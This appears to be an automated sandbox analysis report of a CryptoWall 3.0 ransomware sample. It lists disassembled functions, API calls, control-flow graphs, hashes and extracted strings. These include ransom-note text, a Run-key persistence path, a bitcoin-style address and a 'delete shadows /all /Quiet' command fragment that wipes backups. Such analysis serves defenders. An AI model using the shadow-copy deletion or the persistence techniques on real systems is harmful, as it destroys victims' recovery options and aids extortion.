                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreateFlushValue
                                                                                                                            • String ID: kL$ kL$E722D94C1CAC34B$EnableLinkedConnections$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                            • API String ID: 607596385-1637433729
                                                                                                                            • Opcode ID: a44a133e2775a9e93d4765aaa117b2f79ccb8b74e7474d24b08c2f61539c6c5e
                                                                                                                            • Instruction ID: 12093ea139c300f0673628f6e1cd767ac23dee0a1c6a9d0563fbbeeebcc6888b
                                                                                                                            • Opcode Fuzzy Hash: a44a133e2775a9e93d4765aaa117b2f79ccb8b74e7474d24b08c2f61539c6c5e
                                                                                                                            • Instruction Fuzzy Hash: F0316075B90314BAE728DB94CC86FAAB3B9EB5CB00F214559B700BB1D0D6F4BA40C758
                                                                                                                            Function 004133E0 Relevance: 28.2, APIs: 9, Strings: 7, Instructions: 197fileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 528 4133e0-41340f call 42c690 531 413411-413417 528->531 532 413437-413439 531->532 533 413419-41341c 531->533 534 41343c-41343e 532->534 535 413433-413435 533->535 536 41341e-413426 533->536 537 413652-413660 call 423ebb 534->537 538 413444-41344b 534->538 535->534 536->532 539 413428-413431 536->539 540 413450-413456 538->540 539->531 539->535 542 413476-413478 540->542 543 413458-41345b 540->543 547 41347b-41347d 542->547 545 413472-413474 543->545 546 41345d-413465 543->546 545->547 546->542 548 413467-413470 546->548 547->537 549 413483-41348a 547->549 548->540 548->545 550 413490-413496 549->550 551 4134b6-4134b8 550->551 552 413498-41349b 550->552 553 4134bb-4134bd 551->553 554 4134b2-4134b4 552->554 555 41349d-4134a5 552->555 553->537 556 4134c3-41355c call 42b910 call 424895 call 424820 * 3 CreateFileW 553->556 554->553 555->551 557 4134a7-4134b0 555->557 568 413651 556->568 569 413562-41356a 556->569 557->550 557->554 568->537 570 413570-413575 569->570 570->570 571 413577-41361d WriteFile FlushFileBuffers CloseHandle call 424895 call 424820 * 3 CreateFileW 570->571 580 413650 571->580 581 41361f-413624 571->581 580->568 582 413627-41362c 581->582 582->582 583 41362e-41364a WriteFile FlushFileBuffers CloseHandle 582->583 583->580
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 004134DA
                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 00413555
                                                                                                                            Strings
                                                                                                                            • <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family, xrefs: 0041361F, 00413639, 0041363A
                                                                                                                            • \restore_files_, xrefs: 004134F1, 004135B8
                                                                                                                            • ______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h, xrefs: 00413562, 00413589, 0041358A
                                                                                                                            • .html, xrefs: 004135E4
                                                                                                                            • gpmus, xrefs: 00413507, 004135CE
                                                                                                                            • .txt, xrefs: 0041351D
                                                                                                                            • +M, xrefs: 00413483
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile_memset
                                                                                                                            • String ID: +M$.html$.txt$<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family$\restore_files_$______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h$gpmus
                                                                                                                            • API String ID: 3830271748-3491241186
                                                                                                                            • Opcode ID: e5e22f590959c9eb049987914b0cf799457a953e18fee10b6cfddecb5d0c83de
                                                                                                                            • Instruction ID: b0ebde83edd008dc97222ab2d2d2e2d3358175b2e1a9e19fbf5c8bd48a48a3a8
                                                                                                                            • Opcode Fuzzy Hash: e5e22f590959c9eb049987914b0cf799457a953e18fee10b6cfddecb5d0c83de
                                                                                                                            • Instruction Fuzzy Hash: E6516A3160032065E725AF208C86FE77365EF28754F5002A6F744AB2C5E779AB84C79C
                                                                                                                            Function 00427979 Relevance: 27.0, APIs: 11, Strings: 4, Instructions: 756COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004279DB
                                                                                                                              • Part of subcall function 00424509: __getptd.LIBCMT ref: 0042451C
                                                                                                                              • Part of subcall function 0042570D: __getptd_noexit.LIBCMT ref: 0042570D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Locale$UpdateUpdate::___getptd__getptd_noexit
                                                                                                                            • String ID: $'$@$g
                                                                                                                            • API String ID: 943650538-3237605922
                                                                                                                            • Opcode ID: ff18d5ff2616f6c1daacbd34dc0c4f3e5783049c405b61c98c205c86e21c31dd
                                                                                                                            • Instruction ID: 0fcd1a78de866982d77320298f62bae3608d613f339860b8d170e0d454bda1b6
                                                                                                                            • Opcode Fuzzy Hash: ff18d5ff2616f6c1daacbd34dc0c4f3e5783049c405b61c98c205c86e21c31dd
                                                                                                                            • Instruction Fuzzy Hash: D3626D71A4A23D9ADF348B14E8883EEB7B0AB14314F9401DBD459A7291DB785FC2CF49
                                                                                                                            Function 0041D390 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 78sleepthreadCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 867 41d390-41d3b5 868 41d3c0-41d42a call 42b910 call 424e32 * 2 call 42b910 867->868 869 41d3b7-41d3bd 867->869 878 41d436-41d46d ShellExecuteExA 868->878 879 41d42c 868->879 869->868 880 41d49d-41d4b1 CloseHandle 878->880 881 41d46f-41d47b 878->881 879->878 883 41d4b3-41d4b9 880->883 884 41d4bc-41d4be ExitThread 880->884 882 41d480-41d487 GetLastError 881->882 882->880 885 41d489-41d49b Sleep ShellExecuteExA 882->885 883->884 885->880 885->882
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExecuteShell_memset_strcat_s$CloseErrorExitHandleLastSleepThread
                                                                                                                            • String ID: <$@$delete $shadows /all /Quiet $xfC
                                                                                                                            • API String ID: 745248852-859559790
                                                                                                                            • Opcode ID: 164e4ef4b9723f1a2e0ef6e70ee205d37468e38636fa12a1ef065e9fdc8187f7
                                                                                                                            • Instruction ID: 9c1bbf38363198c24e56f9ed804daa07495aa1b6d26b64f44dc71bd627e4087d
                                                                                                                            • Opcode Fuzzy Hash: 164e4ef4b9723f1a2e0ef6e70ee205d37468e38636fa12a1ef065e9fdc8187f7
                                                                                                                            • Instruction Fuzzy Hash: 5E31A9B09002289BDB20DF61DC81FDE7778EB18744F41449AE248A7250D7B8AEC4CF98
                                                                                                                            Function 0041DDD0 Relevance: 22.6, APIs: 15, Instructions: 109COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • SetLastError.KERNEL32(00000057,75DC55D0,?,0041D8BB,?), ref: 0041DDED
                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,0041D8BB,00000000,75DC55D0,?,0041D8BB,?), ref: 0041DE01
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,0041D8BB,?), ref: 0041DE08
                                                                                                                            • GetLastError.KERNEL32(?,0041D8BB,?), ref: 0041DE12
                                                                                                                            • CloseHandle.KERNEL32(0041D8BB), ref: 0041DE9C
                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,?,0041D8BB,?), ref: 0041DEAA
                                                                                                                            • SetLastError.KERNEL32(?,?,0041D8BB,?), ref: 0041DEBD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$Process$CloseCurrentFreeHandleLocalOpenToken
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1977215774-0
                                                                                                                            • Opcode ID: c3f24fab59104aeebdad769a3f0e064d37fd30a399ed324870e09b765df70f4b
                                                                                                                            • Instruction ID: 1eea03d9ae6eddd41489c6ef4305d71b5ef469a94ef1391061eac8053bd55b54
                                                                                                                            • Opcode Fuzzy Hash: c3f24fab59104aeebdad769a3f0e064d37fd30a399ed324870e09b765df70f4b
                                                                                                                            • Instruction Fuzzy Hash: 7431A2B5D00208EFCB14DFA8DC48AEFBBB8EF58311F108566E905D7210D7349A819BA4
                                                                                                                            Function 00401A20 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 140registryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • RegCreateKeyExW.KERNEL32(80000003,\S-1-5-18\Software\msys\,00000000,00000000,00000000,00020019,00000000,?,00000000), ref: 00401A59
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00401AE2
                                                                                                                            • RegQueryValueExW.ADVAPI32(00000000,0043343C,00000000,?,0043CA20,00000008), ref: 00401A81
                                                                                                                              • Part of subcall function 00402DE0: __strftime_l.LIBCMT ref: 00402DF2
                                                                                                                            • RegCreateKeyExW.KERNEL32(80000001,Software\msys\,00000000,00000000,00000000,0002001F,00000000,00000000,00000000), ref: 00401B10
                                                                                                                            • RegQueryValueExW.KERNEL32(00000000,0043343C,00000000,?,0043CA20,00000008), ref: 00401B2A
                                                                                                                            • RegSetValueExW.KERNEL32 ref: 00401B6A
                                                                                                                            • RegFlushKey.ADVAPI32(00000000), ref: 00401B74
                                                                                                                            • RegCloseKey.KERNEL32(00000000), ref: 00401BD5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$CloseCreateQuery$Flush__strftime_l
                                                                                                                            • String ID: %X%X%X%X%X%X%X%X$E722D94C1CAC34B$Software\msys\$\S-1-5-18\Software\msys\
                                                                                                                            • API String ID: 1839477016-873827912
                                                                                                                            • Opcode ID: c27c1d22e556df01829b08983ba4e0426eb24db553ffa7f2585890b6bb95cac8
                                                                                                                            • Instruction ID: 9685e600e0c5b42de14bfeeca4ed7f4a10fcdf9f0481810e012af34b19a7429f
                                                                                                                            • Opcode Fuzzy Hash: c27c1d22e556df01829b08983ba4e0426eb24db553ffa7f2585890b6bb95cac8
                                                                                                                            • Instruction Fuzzy Hash: 84410B717642A87AD710E7A5AC81F7A7BFC974DB01F10906AF640B61D1D2F8AB009B7C
                                                                                                                            Function 0041B6A9 Relevance: 19.7, APIs: 13, Instructions: 160memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 922 41b6a9 923 41b6b0-41b6d0 call 41b260 Heap32Next 922->923 926 41b6d2-41b6d5 923->926 927 41b6d7 923->927 926->923 926->927 928 41b6dd-41b6ed Heap32ListNext 927->928 929 41b6f9-41b709 928->929 930 41b6ef-41b6f3 GetTickCount 928->930 932 41b713-41b726 Process32First 929->932 933 41b70b-41b70d GetTickCount 929->933 930->929 931 41b668-41b6a0 call 41b260 Heap32First 930->931 931->928 942 41b6a2-41b6a7 931->942 934 41b728-41b756 call 41b260 932->934 935 41b75e-41b76e 932->935 933->932 934->935 949 41b758-41b75c GetTickCount 934->949 939 41b770-41b772 GetTickCount 935->939 940 41b778-41b78b 935->940 939->940 945 41b7c3-41b7d3 940->945 946 41b78d-41b7bb call 41b260 940->946 942->923 947 41b7d5-41b7d7 GetTickCount 945->947 948 41b7dd-41b7f0 945->948 946->945 958 41b7bd-41b7c1 GetTickCount 946->958 947->948 954 41b7f2 948->954 955 41b836-41b83c 948->955 949->934 949->935 959 41b800-41b82e call 41b260 954->959 956 41b847-41b84c CloseHandle 955->956 957 41b83e-41b845 955->957 960 41b852-41b873 FreeLibrary call 41b900 GlobalMemoryStatus 956->960 957->960 958->945 958->946 959->955 970 41b830-41b834 GetTickCount 959->970 968 41b875-41b87a 960->968 969 41b87f-41b884 960->969 968->969 971 41b8a5-41b8b6 GetCurrentProcessId 969->971 972 41b886-41b8a2 969->972 970->955 970->959 973 41b8c2-41b8c7 971->973 974 41b8b8-41b8bd 971->974 972->971 975 41b8e5-41b8fe call 423ebb 973->975 976 41b8c9-41b8e2 973->976 974->973 976->975
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CountTick$Heap32Next$FirstFreeLibraryListProcess32
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3391139479-0
                                                                                                                            • Opcode ID: d08d3607a5a92fb423bab01760a1a07046f89f88a6f18c66bb50b19f3c9d9e8d
                                                                                                                            • Instruction ID: 38ae835f69b5caf0217579c2b68f6554e75d00015f7552b6d1dbb779c9d70d1f
                                                                                                                            • Opcode Fuzzy Hash: d08d3607a5a92fb423bab01760a1a07046f89f88a6f18c66bb50b19f3c9d9e8d
                                                                                                                            • Instruction Fuzzy Hash: 305150706043458BD720EF65C884BAFB7F8FF84744F00892EE59997250DB74D489CBAA
                                                                                                                            Function 0041DEE0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 110fileprocessCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0041DF18
                                                                                                                              • Part of subcall function 00421AA0: GetTickCount.KERNEL32(?,?,?,?,004137A9,gpmus,00000005), ref: 00421AB0
                                                                                                                              • Part of subcall function 00421AA0: _rand.LIBCMT ref: 00421AC0
                                                                                                                              • Part of subcall function 00421AA0: Sleep.KERNEL32(0000000F), ref: 00421AE7
                                                                                                                            • PathFindFileNameW.SHLWAPI(004C6B20), ref: 0041DF31
                                                                                                                              • Part of subcall function 0041F000: __strftime_l.LIBCMT ref: 0041F015
                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0041DF6E
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000,75DC55D0,?,0041D906), ref: 0041DF76
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041DF7F
                                                                                                                            • CopyFileW.KERNEL32 ref: 0041DFCC
                                                                                                                            • _memset.LIBCMT ref: 0041DFD7
                                                                                                                            • CreateProcessW.KERNEL32 ref: 0041E015
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Create_memset$CloseCopyCountErrorFindHandleLastNamePathProcessSleepTick__strftime_l_rand
                                                                                                                            • String ID: %s\%s$%s\svc%s.exe$D
                                                                                                                            • API String ID: 2352187395-2913687874
                                                                                                                            • Opcode ID: a20d45d61241b59f2c321c9321a4567096e053eabdf7572bf23e80bf7564b412
                                                                                                                            • Instruction ID: a58a0c032f7148f8b8d39ec015e3b63cf3cbfd45348febe8a0205d2eea09b8c4
                                                                                                                            • Opcode Fuzzy Hash: a20d45d61241b59f2c321c9321a4567096e053eabdf7572bf23e80bf7564b412
                                                                                                                            • Instruction Fuzzy Hash: 0D31A9717543406BE320DB64DC46FAB73A8EB88710F50491EF648DB1D1EBB5A504C7AA
                                                                                                                            Function 00401900 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 84registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0040192C
                                                                                                                            • _memset.LIBCMT ref: 00401970
                                                                                                                            • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00020019,00000000,?,00000000), ref: 004019CA
                                                                                                                            • RegQueryValueExW.KERNEL32(?,data,00000000,?,1FQ2d43QjTT8zSrWe41EdxtvcVUMWyryJB,00000108), ref: 004019F1
                                                                                                                            • RegCloseKey.KERNEL32(?), ref: 00401A00
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$CloseCreateQueryValue
                                                                                                                            • String ID: 1FQ2d43QjTT8zSrWe41EdxtvcVUMWyryJB$E722D94C1CAC34B$S-1-5-18\Software\%s$Software\%s$data
                                                                                                                            • API String ID: 37298109-134954523
                                                                                                                            • Opcode ID: 4d9f7e680543d8d99612271e93866219557d09a56873c7beb9fb3b5f938b10b2
                                                                                                                            • Instruction ID: 4086e6915d2916525553412eae5256325c76b2fa15a3c6f4e048d67b62872145
                                                                                                                            • Opcode Fuzzy Hash: 4d9f7e680543d8d99612271e93866219557d09a56873c7beb9fb3b5f938b10b2
                                                                                                                            • Instruction Fuzzy Hash: C2219A75E503187BE724DB509C46FEA7374DB18B00F104199BB44771C1EAF46EC48B99
                                                                                                                            Function 00401840 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00401869
                                                                                                                              • Part of subcall function 00402DC0: __strftime_l.LIBCMT ref: 00402DD5
                                                                                                                            • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 004018AE
                                                                                                                            • RegSetValueExW.KERNEL32 ref: 004018CE
                                                                                                                            • RegFlushKey.ADVAPI32(?), ref: 004018DB
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004018E8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreateFlushValue__strftime_l_memset
                                                                                                                            • String ID: 1FQ2d43QjTT8zSrWe41EdxtvcVUMWyryJB$E722D94C1CAC34B$Software\%s$data
                                                                                                                            • API String ID: 664986230-1407575524
                                                                                                                            • Opcode ID: ac7df4acec9e5397a45f0ef04bef7e813b3d42dfe4ca5ab36e793aa8752a91ba
                                                                                                                            • Instruction ID: d62cbd1ca9b6743c82e337ef7ba3e84bf7ad82d39c7eccfb29dc7f2b897fbdcf
                                                                                                                            • Opcode Fuzzy Hash: ac7df4acec9e5397a45f0ef04bef7e813b3d42dfe4ca5ab36e793aa8752a91ba
                                                                                                                            • Instruction Fuzzy Hash: DE11E575B90318BBD724DB60DC46FD97378AB18B01F104099BA85B61D0DEF46AC48B58
                                                                                                                            Function 00413780 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 167threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00421AA0: GetTickCount.KERNEL32(?,?,?,?,004137A9,gpmus,00000005), ref: 00421AB0
                                                                                                                              • Part of subcall function 00421AA0: _rand.LIBCMT ref: 00421AC0
                                                                                                                              • Part of subcall function 00421AA0: Sleep.KERNEL32(0000000F), ref: 00421AE7
                                                                                                                            • ExitThread.KERNEL32 ref: 004139A8
                                                                                                                              • Part of subcall function 0040EB90: _aullshr.NTDLL ref: 0040EC0D
                                                                                                                            • GetLogicalDriveStringsW.KERNEL32(00000100,?), ref: 004137D7
                                                                                                                            • _memset.LIBCMT ref: 004137F6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CountDriveExitLogicalSleepStringsThreadTick_aullshr_memset_rand
                                                                                                                            • String ID: A:\$B:\$gpmus
